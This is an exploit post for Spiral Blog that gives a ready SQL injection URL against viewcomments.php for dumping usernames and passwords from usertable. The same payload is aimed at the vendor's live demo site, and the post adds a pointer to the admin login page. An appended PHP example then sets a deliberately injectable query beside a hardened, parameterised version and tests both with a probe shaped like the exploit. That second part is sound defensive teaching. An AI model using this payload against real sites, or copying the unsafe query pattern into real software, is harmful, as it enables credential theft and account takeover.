Gonzalez

Spiral Blog SQL Injection Vulnerabilities

--==+================================================================================+==-- 
--==+ Spiral Blog SQL Injection Vulnerabilities +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog


SCRIPT DOWNLOAD: N/A


SITE: http://www.spiralscripts.co.uk


DORK: N/A

DESCRIPTION: get users/admins password

EXPLOITS:

EXPLOIT 1: http://www.server.com/SCRIPT_PATH/viewcomments.php?blogid=-1 UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,6 from usertable--


EXAMPLES:

EXAMPLE ON DEMO: http://www.spiralscripts.co.uk/demoscripts/blog/viewcomments.php?blogid=-1 UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,6 from usertable--

NOTE/TIP: admin login: http://www.server.com/BLOG_PATH/admin

GREETZ: milw0rm.com, H4CKY0u.org, ~removed~ !


--==+================================================================================+==--
--==+ Spiral Blog SQL Injection Vulnerabilities +==--
--==+================================================================================+==--
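
For anyone maintaining a script like this: the post above implies that viewcomments.php places the blogid request value directly into its SQL text. The following is an added example, not Spiral Blog's code and not part of the original post, showing that assumed pattern beside a hardened version. The comments table, its columns, the sample rows and both function names are constructed for illustration; only blogid, usertable, username, password and the six-column result come from the post.

```php
<?php
// Added example. Schema, rows and function names are constructed for illustration.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE comments (id INTEGER, blogid INTEGER, author TEXT,
           body TEXT, email TEXT, posted TEXT)');
$db->exec('CREATE TABLE usertable (username TEXT, password TEXT)');
$db->exec("INSERT INTO comments VALUES (1, 7, 'alice', 'Nice post', 'a@example.test', '2008-01-01')");
$db->exec("INSERT INTO usertable VALUES ('admin', 'constructed-hash')");

// Assumed vulnerable pattern: the request value becomes part of the SQL text,
// so anything after the number is parsed as SQL.
function comments_unsafe(PDO $db, string $blogid): array
{
    $sql = "SELECT * FROM comments WHERE blogid = $blogid";
    return $db->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Hardened: accept only a positive integer, then bind it as a typed parameter.
function comments_safe(PDO $db, string $blogid): array
{
    $id = filter_var($blogid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [];               // reject instead of querying
    }
    $stmt = $db->prepare(
        'SELECT id, blogid, author, body, email, posted FROM comments WHERE blogid = :blogid'
    );
    $stmt->bindValue(':blogid', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// Constructed input shaped like the blogid value in EXPLOIT 1 (concat() dropped for SQLite).
$probe = '-1 UNION ALL SELECT 1,2,3,username,5,6 FROM usertable--';

foreach (['7', $probe] as $input) {
    printf("input: %s\n", $input);
    printf("  unsafe rows: %s\n", json_encode(comments_unsafe($db, $input)));
    printf("  safe rows:   %s\n", json_encode(comments_safe($db, $input)));
}
```

Run with the PHP CLI and the pdo_sqlite extension. With the probe input the unsafe function returns a row built from usertable, while the hardened one rejects the value before any query runs.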
